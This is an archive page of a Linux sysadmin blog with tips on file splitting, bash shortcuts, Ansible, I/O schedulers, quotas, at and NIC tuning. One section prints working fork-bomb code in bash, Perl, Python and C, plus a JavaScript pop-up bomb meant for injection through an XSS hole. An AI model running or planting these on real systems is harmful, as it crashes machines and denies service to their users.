Monthly Archives: September 2013

split file into thousands of pieces


Multiply the total number of files by the size of each file (in bytes). For example, to create 10000 files that are 10 bytes each: 10000 * 10 = 100,000 bytes. This is the size of the master file that is needed.

dd if=/dev/zero of=testfile bs=10 count=10000

split -b 10 -a 10 testfile

The -b option specifies the size in bytes of each output file. The -a option sets the length of the suffix appended to each output file name; combined with split’s default one-character prefix x, -a 10 produces 11-character file names.
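
A quick sanity check after the split (a sketch; it assumes the pieces were written to the current directory with split’s default x prefix):

ls x* | wc -l            # should print 10000
stat -c %s xaaaaaaaaaa   # each piece should be 10 bytes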

bash console shortcuts

Ctrl + A Go to the beginning of the line you are currently typing on
Ctrl + E Go to the end of the line you are currently typing on
Ctrl + L Clears the Screen, similar to the clear command
Ctrl + U Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + H Same as backspace
Ctrl + R Lets you search through previously used commands
Ctrl + C Kill whatever you are running
Ctrl + D Exit the current shell
Ctrl + Z Puts whatever you are running into a suspended background process. fg restores it.
Ctrl + W Delete the word before the cursor
Ctrl + K Clear the line after the cursor
Ctrl + T Swap the last two characters before the cursor
Esc + T Swap the last two words before the cursor
Alt + F Move cursor forward one word on the current line
Alt + B Move cursor backward one word on the current line
Tab Auto-complete files and folder names
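
These are standard readline bindings, so you can list what your own shell actually has mapped (a quick check, not part of the original list):

bind -P | grep -E 'beginning-of-line|reverse-search-history|transpose-words'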

about Ansible

Ansible is an open source IT configuration management, deployment, and orchestration tool. It differs from other management tools in many respects, aiming to provide large productivity gains across a wide variety of automation challenges. While Ansible provides more productive drop-in replacements for many core capabilities found in other automation solutions, it also seeks to solve other major unsolved IT challenges by unifying configuration, deployment, and complex IT process orchestration.

One of the most important challenges in this environment is to do all of the above while providing a robust, easy-to-manage architecture, a problem that is frequently not well solved in this application space. A management tool should not impose additional demands on one’s environment; in fact, one should have to think about it as little as possible. It should be transparent and maximize productivity gains. Let’s see how Ansible achieves these gains using a unique agentless architecture.

Bash fork() Bomb

: () { : | : & };:

It works by creating a large number of processes very quickly in order to saturate the available space in the process table kept by the operating system. Once the process table is saturated, no new programs can start.

Some more forks:

An inline shell example using the Perl interpreter:

 perl -e "fork while fork" &

Using Python:

 import os

 while os.fork() or True: os.fork()

A more compact version of the above (which doesn’t check if os.fork exists)

 while 1: __import__("os").fork()

Or in C:

 #include <unistd.h>

 int main()
 {
   while(1)
     fork();
 }

JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>
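
A common way to blunt a fork bomb (a sketch, assuming bash and pam_limits; the numbers are only examples) is to cap how many processes a single user may create:

 # per-session cap from the shell
 ulimit -u 4096
 # system-wide cap for an ordinary user, in /etc/security/limits.conf
 someuser  hard  nproc  4096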

Ansible Secure and Agentless

Ansible relies on the most secure remote management system available as its default transport layer: OpenSSH. OpenSSH is available for a wide variety of platforms, is very lightweight, and as security issues in OpenSSH are discovered, they are patched quickly.

Further, Ansible does not require any remote agents. It delivers Ansible modules to remote systems and executes tasks, as needed, to enact the desired configuration. These modules run with user-supplied credentials, including support for sudo and even Kerberos, and clean up after themselves when complete. Ansible does not require root privileges, specific SSH keys, or dedicated users and respects the security model of the system under management.

As a result, Ansible has a very low attack surface area and is quite easy to bootstrap.
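
As a quick illustration of the agentless model (a sketch; the inventory file, host names, and user are assumptions, not from the original text), an ad-hoc module run goes out over SSH and leaves nothing behind:

ansible all -i hosts -m ping -u admin --sudo   # ping every host in ./hosts, escalating with sudo
ansible web01 -i hosts -m setup -u admin       # gather facts from a single host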

CFQ IO Scheduler tuning

CFQ IO Scheduler

Recall that the CFQ scheduler was written in response to some potential problems with the deadline scheduler. In particular, in an interview, Jens Axboe, the developer of CFQ, deadline, and a few other IO schedulers, stated, “While deadline worked great from a latency and hard drive perspective, it had no concept of individual process fairness.” So one process doing a great deal of IO could starve the IO of other applications.

The CFQ scheduler created the concept of having queues for each process. These queues are created as needed for a particular process. Also, while perhaps not new, the scheduler divided the concept of IO into two parts, Synchronous IO and Asynchronous IO (AIO). Synchronous IO is important because the application stops running until the IO request is finished. In other words, synchronous IO “blocks” the execution of the application until it is done. This is fairly common in read operations because an application may need to read some input data prior to continuing execution.

On the other hand, AIO allows an application to continue operation because the result of the IO operation returns immediately. So rather than wait for confirmation that the application’s IO request has succeeded as in the case of synchronous IO, for AIO the result is returned immediately even if the IO operation has not yet finished. This is potentially very useful for write operations and allows the application to overlap IO with computation (helps efficiency – that is, it can improve run time).

CFQ was designed to separate synchronous and asynchronous IO operations, favoring synchronous operations (naturally). It also favors read operations for a couple of reasons: (1) reads tend to block execution because the application needs the data to continue, and (2) with the elevator approach it is possible for a scheduler to “starve” a read operation that lies far out on the disk geometry (near the outside of the disk). By favoring read operations, CFQ improves read responsiveness and greatly reduces the possibility of such far-out read starvation.

CFQ goes even further by keeping the concept of deadlines from the Deadline IO Scheduler to prevent IO operations from being starved. Jens wrote the deadline scheduler and realized that, for good performance in some applications, it needed the concept of an IO operation “timing out.” That is, an IO operation may be put into a queue for execution, but subsequent IO operations may be placed ahead of it in the queue. The IO request at the end of the queue may therefore never get executed, or its execution may be seriously delayed. The deadline IO scheduler has the concept of a “time-out” period: if an IO request has not been executed within this period, it is executed immediately. This keeps IO operations from starving in the queue.

Jens combined all of these ideas, along with the per-process queues, to create CFQ. It can be rather complicated to define exactly how these concepts interact, and it is beyond the scope of this article to go into detail, but understanding the concepts that go into CFQ is very important, particularly if we are going to try tuning the scheduler for performance.


Tunable Parameters in CFQ

In addition to open source giving you access to the code so you can adapt it to your requirements yourself, the developers of a piece of software often let you “tune” the application for your situation without having to hack the code base. The IO schedulers in the Linux kernel are no exception. In particular, the CFQ scheduler has 9 parameters for tuning performance; they are exposed through sysfs, as shown in the sketch after this list. While discussing the parameters can get long, it is worthwhile to take a look at them in a bit more depth:

  1. back_seek_max
    This parameter, given in KBytes, sets the maximum “distance” for backward seeking; by default it is 16 MBytes. The distance is measured from the current head location back toward sectors that lie behind it. The idea comes from the Anticipatory Scheduler (AS), which anticipates the location of the next request: it allows the scheduler to consider requests in the “backward” (opposite) direction as candidates for being served “next” if they are within this distance of the current head location.
  2. back_seek_penalty
    This parameter is used to compute the cost of backward seeking. If the backward distance of a request is just (1/back_seek_penalty) of the distance to a “front” request, then the seeking cost of the two requests is considered equivalent and the scheduler will not bias toward one or the other (otherwise the scheduler biases the selection toward “front direction” requests). Recall that CFQ uses the elevator concept, so it tries to keep seeking in the current direction as much as possible to avoid the latency associated with a seek. This parameter defaults to 2, so if the backward distance is only 1/2 of the forward distance, CFQ considers the backward request close enough to the current head location and treats it like a forward request.
  3. fifo_expire_async
    This parameter sets the timeout of asynchronous requests. Recall that CFQ maintains a FIFO (first-in, first-out) list to manage timed-out requests. In addition, CFQ doesn’t check the FIFO queue for further expired requests right after one timed-out request is dispatched (i.e. there is a delay in processing expired requests). The default value for this parameter is 250 ms. A smaller value means expired asynchronous requests are acted upon sooner than with a larger value.
  4. fifo_expire_sync
    This parameter is the same as fifo_expire_async but for synchronous requests. The default value for this parameter is 125 ms. If you want to favor synchronous requests over asynchronous requests, then this value should be decreased relative to fifo_expire_async.
  5. slice_sync
    Remember that when a queue is selected for execution, its IO requests are only executed for a certain amount of time (the time slice) before CFQ switches to another queue. This parameter is used to calculate the time slice of the synchronous queue. The default value is 100 ms, but this is not the actual time slice; rather, the time slice is computed as time_slice = slice_sync + (slice_sync / 5 * (4 - io_priority)). For example, with the default slice_sync of 100 ms and an io_priority of 0, the slice works out to 100 + (100 / 5 * 4) = 180 ms. If you want the time slice for the synchronous queue to be longer (perhaps you have more synchronous operations), increase slice_sync.
  6. slice_async
    This parameter is the same as slice_sync but for the asynchronous queue. The default is 40 ms. Notice that synchronous operations are preferred over asynchronous operations.
  7. slice_async_rq
    This parameter limits the dispatching of asynchronous requests to the device request queue during a queue’s slice time, i.e. it limits how many asynchronous requests are dispatched. The maximum number of requests that may be dispatched also depends upon the IO priority. The equation for computing the maximum number of requests is max_nr_requests = 2 * (slice_async_rq + slice_async_rq * (7 - io_priority)). The default for slice_async_rq is 2.
  8. slice_idle
    This parameter is the idle time for the synchronous queue only. Within a queue’s time slice (the amount of time during which its operations can be dispatched), when there are no requests left in the synchronous queue CFQ does not immediately switch to another queue but sits idle, waiting for the process to create more requests. If no new requests are submitted within the idle time, the queue expires. The default value is 8 ms. This parameter controls how long the scheduler waits for further synchronous requests, which matters because synchronous requests tend to block the process until the operation completes. Consequently, the IO scheduler looks within this idle window for synchronous requests that might come from, say, a streaming video application or anything else that issues synchronous operations.
  9. quantum
    This parameter controls the number of requests dispatched to the device request queue (i.e. the number of requests that are sent to the device for execution). During a queue’s time slice, a request will not be dispatched if the number of requests already in the device request queue exceeds this parameter. For the asynchronous queue, dispatching is additionally restricted by slice_async_rq. The default for this parameter is 4.
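
All nine parameters are exposed under sysfs, so they can be inspected and changed at runtime (a sketch; it assumes sda is using the cfq scheduler, and the values are only examples):

ls /sys/block/sda/queue/iosched/
cat /sys/block/sda/queue/iosched/slice_idle
echo 0 > /sys/block/sda/queue/iosched/slice_idle     # e.g. disable idling on fast storage
echo 120 > /sys/block/sda/queue/iosched/slice_sync   # give synchronous queues a longer slice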

You can see that the CFQ scheduler prefers synchronous IO requests. The reason for this is fairly simple: synchronous IO operations block execution, so until the IO operation is executed the application cannot continue to run. Such applications include streaming video or streaming audio (who wants their movie or music to be interrupted?), but a great many other applications perform synchronous IO as well.


On the other hand, Asynchronous IO (AIO) can be very useful because control returns to the application immediately, without waiting for confirmation that the operation has completed. This allows the application to “overlap” computation and IO, which can be very useful for many workloads depending upon the goals and requirements. There is quite a good article that talks about synchronous versus asynchronous and blocking versus non-blocking IO requests.

This article from: http://www.linux-mag.com/id/7572/

Linux I/O Scheduler

I/O scheduling controls how input/output operations will be submitted to storage.

The Completely Fair Queuing (CFQ) scheduler is the default algorithm in Red Hat Enterprise Linux and related distributions such as CentOS and Fedora. As the name implies, CFQ maintains a scalable per-process I/O queue and attempts to distribute the available I/O bandwidth equally among all I/O requests. CFQ is well suited for mid-to-large multi-processor systems and for systems which require balanced I/O performance over multiple LUNs and I/O controllers.

The Deadline elevator uses a deadline algorithm to minimize I/O latency for a given I/O request. The scheduler provides near real-time behavior and uses a round robin policy to attempt to be fair among multiple I/O requests and to avoid process starvation. Using five I/O queues, this scheduler will aggressively re-order requests to improve I/O performance.

The NOOP scheduler is a simple FIFO queue and uses the minimal amount of CPU/instructions per I/O to accomplish the basic merging and sorting functionality to complete the I/O. It assumes performance of the I/O has been or will be optimized at the block device (memory-disk) or with an intelligent HBA or externally attached controller.

The Anticipatory elevator introduces a controlled delay before dispatching the I/O to attempt to aggregate and/or re-order requests improving locality and reducing disk seek operations. This algorithm is intended to optimize systems with small or slow disk subsystems. One artifact of using the AS scheduler can be higher I/O latency.

cat /sys/block/sda/queue/scheduler

noop deadline [cfq]

cfq is the default on Fedora 19, which is my current OS 🙂

If you want to change the scheduler: echo noop > /sys/block/sda/queue/scheduler


A little bit more:

  • noop is often the best choice for memory-backed block devices (e.g. ramdisks) and other non-rotational media (flash) where trying to reschedule I/O is a waste of resources
  • as (anticipatory) is conceptually similar to deadline, but with more heuristics that often improve performance (but sometimes can decrease it)
  • deadline is a lightweight scheduler which tries to put a hard limit on latency
  • cfq tries to maintain system-wide fairness of I/O bandwidth

The default was anticipatory for a long time, and it received a lot of tuning. cfq became the default some while ago, as its performance is reasonable and fairness is a good goal for multi-user systems (and even single-user desktops). For some scenarios — databases are often used as examples, as they tend to already have their own peculiar scheduling and access patterns, and are often the most important service (so who cares about fairness?) — anticipatory has a long history of being tunable for best performance on these workloads, and deadline very quickly passes all requests through to the underlying device.
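
To make the choice survive a reboot (a sketch, assuming a GRUB2-based system such as Fedora 19; paths differ on other setups), set it on the kernel command line:

# in /etc/default/grub, append elevator=<scheduler> to the existing line:
GRUB_CMDLINE_LINUX="... elevator=deadline"
# then regenerate the grub configuration
grub2-mkconfig -o /boot/grub2/grub.cfg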


MySQL database size limit

The effective maximum table size for MySQL databases is usually determined by operating system constraints on file sizes, not by MySQL internal limits. The following table lists some examples of operating system file-size limits. This is only a rough guide and is not intended to be definitive. For the most up-to-date information, be sure to check the documentation specific to your operating system.

Operating System File-size Limit
Win32 w/ FAT/FAT32 2GB/4GB
Win32 w/ NTFS 2TB (possibly larger)
Linux 2.2-Intel 32-bit 2GB (LFS: 4GB)
Linux 2.4+ (using ext3 file system) 4TB
Solaris 9/10 16TB
MacOS X w/ HFS+ 2TB
NetWare w/NSS file system 8TB
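
To see how close your own tables are getting to these limits (a sketch; the login options are assumptions), information_schema reports the data and index size of every table:

mysql -u root -p -e "SELECT table_schema, table_name,
    ROUND((data_length + index_length) / 1024 / 1024, 1) AS size_mb
  FROM information_schema.TABLES
  ORDER BY data_length + index_length DESC
  LIMIT 10;"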

Verify DNS SRV Records


host -t SRV _some_service._tcp.yourdomain.com
_some_service._tcp.yourdomain.com has SRV record 100 1 5061 target_hostname.

where 100 is the priority, 1 the weight, and 5061 the port. The same check on Windows with nslookup:
c:\> nslookup
> set type=any
> set verbose
> _some_service._tcp.yourdomain.com
_some_service._tcp.yourdomain.com      SRV service location:
          priority       = 100
          weight         = 1
          port           = 5061
          svr hostname   = target_hostname
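
The same record can also be queried with dig (assuming the dig utility from bind-utils is installed):

dig +short SRV _some_service._tcp.yourdomain.com
# expected output: 100 1 5061 target_hostname.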

Centos/RHEL enable user quota

Quota is useful for limiting the disk usage for users or groups.

###To verify that the quota is enabled in the kernel###
#grep CONFIG_QUOTA /boot/config-`uname -r`
CONFIG_QUOTA=y
CONFIG_QUOTA_NETLINK_INTERFACE=y
# CONFIG_QUOTA_DEBUG is not set
CONFIG_QUOTA_TREE=y
CONFIG_QUOTACTL=y
[root@rajat rajat]#
Create user :
useradd some_user
passwd some_user

Edit /etc/fstab :
From :
/dev/sdaX /home ext3 defaults 1 2
To :
/dev/sdaX /home ext3 defaults,usrquota,grpquota 1 2

Remount the disk (make sure it’s not in use) :
mount -o remount /home

Check if usrquota and grpquota are enabled :
mount | grep /home

Create quota files :
quotacheck -cvug /home

This creates /home/aquota.user and /home/aquota.group

Check quota :
#quotacheck -avug

Enable quota for user1 :

edquota user1
Edit the soft and hard block limits (in 1 KB blocks, so 1000 ≈ 1 MB) or the inode limits.
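
The same limits can be set non-interactively with setquota (a sketch; the numbers are only example values):

# block soft/hard limits (1 KB blocks), then inode soft/hard limits, on /home
setquota -u user1 100000 120000 0 0 /home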

Check the quota for user1 :
quota user1

Enable quota :
quotaon -avug

In addition :

Through cron, run every night when the filesystem is not in use :
quotaoff -avug && quotacheck -avug && quotaon -avug
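
For example, as a root crontab entry (the 03:00 time is just an assumed quiet period):

# crontab -e (as root)
0 3 * * * quotaoff -avug && quotacheck -avug && quotaon -avug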

Get quota stats :
repquota -a

at Command Syntax

Example Meaning (assuming the command is issued at 10:00 AM on September 18, 2001)
at noon 12:00 PM September 18, 2001
at midnight 12:00 AM September 19, 2001
at teatime 4:00 PM September 18, 2001
at tomorrow 10:00 AM September 19, 2001
at noon tomorrow 12:00 PM September 19, 2001
at next week 10:00 AM September 25, 2001
at next monday 10:00 AM September 24, 2001
at fri 10:00 AM September 21, 2001
at OCT 10:00 AM October 18, 2001
at 9:00 AM 9:00 AM September 19, 2001
at 2:30 PM 2:30 PM September 18, 2001
at 1430 2:30 PM September 18, 2001
at 2:30 PM tomorrow 2:30 PM September 19, 2001
at 2:30 PM next month 2:30 PM October 18, 2001
at 2:30 PM Fri 2:30 PM September 21, 2001
at 2:30 PM 9/21 2:30 PM September 21, 2001
at 2:30 PM Sept 21 2:30 PM September 21, 2001
at 2:30 PM 9/21/2010 2:30 PM September 21, 2010
at 2:30 PM 21.9.10 2:30 PM September 21, 2010
at now + 30 minutes 10:30 AM September 18, 2001
at now + 1 hour 11:00 AM September 18, 2001
at now + 2 days 10:00 AM September 20, 2001
at 4 PM + 2 days 4:00 PM September 20, 2001
at now + 3 weeks 10:00 AM October 9, 2001
at now + 4 months 10:00 AM January 18, 2002
at now + 5 years 10:00 AM September 18, 2007

ACL

Access to the at command is controlled by a pair of files called at.allow and at.deny. The location and even the exact use of these files vary from system to system; for Linux they live in /etc. On Linux:

  • If neither file exists then only the user root can use the at command.
  • If only at.deny exists, then any user except those listed in this file can use the at command.
  • If at.allow exists then only users listed in this file can use the at command.  Note if this file exists then any at.deny file is ignored.

To see a list of pending at jobs (the ones that haven’t run yet), use the command “atq”. This will show the job number and the date and time for that job.

To see the contents of some at job, use the command “at -c jobnum”. This shows the complete environment that gets set for the job as well; the actual commands of your job are at the bottom.

To delete an at job before it has run, use the command “atrm jobnum”.

An at job may be created in a particular queue, using the form “at -q queue date-time”. The queue is a single letter. The default queue is “a”. Queue “b” is reserved for batch jobs. Using higher-lettered queues will run your at job with higher nice values.
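
Putting it together (a sketch; the backed-up path, time, and job number are only examples):

echo "tar czf /tmp/home-backup.tgz /home" | at 2:30 PM tomorrow
atq          # list pending jobs and their numbers
at -c 5      # inspect job 5
atrm 5       # remove job 5 before it runs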

packet loss on NIC interface

The default settings for NICs are good for most cases; however, there are times when you need to do some performance tuning.
When you start to observe an increasing number of dropped RX packets, it means your system cannot process incoming packets fast enough. Check your monitoring system to correlate the drops with increased network traffic at the same time.
# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:22:19:50:ea:76
inet addr:192.168.x.x  Bcast:192.168.x.x  Mask:255.255.xxx.xxx
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:3208932 errors:0 dropped:19188 overruns:0 frame:0
TX packets:1543138 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000

First verify the current NIC settings:
# ethtool -g eth0
Ring parameters for eth0:
Pre-set maximums:
RX:             1020
RX Mini:        0
RX Jumbo:       4080
TX:             255
Current hardware settings:
RX:             255
RX Mini:        0
RX Jumbo:       0
TX:             255

Increasing the RX ring buffer size should fix this issue:
# ethtool -G eth0 rx 512

To make this setting persistent, add the command to the /etc/rc.local script.
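
For example (a sketch; the device name and ring size are simply the values used above):

# confirm the new ring size took effect
ethtool -g eth0
# re-apply it at boot
echo '/sbin/ethtool -G eth0 rx 512' >> /etc/rc.local
# keep an eye on the drop counter afterwards
ip -s link show eth0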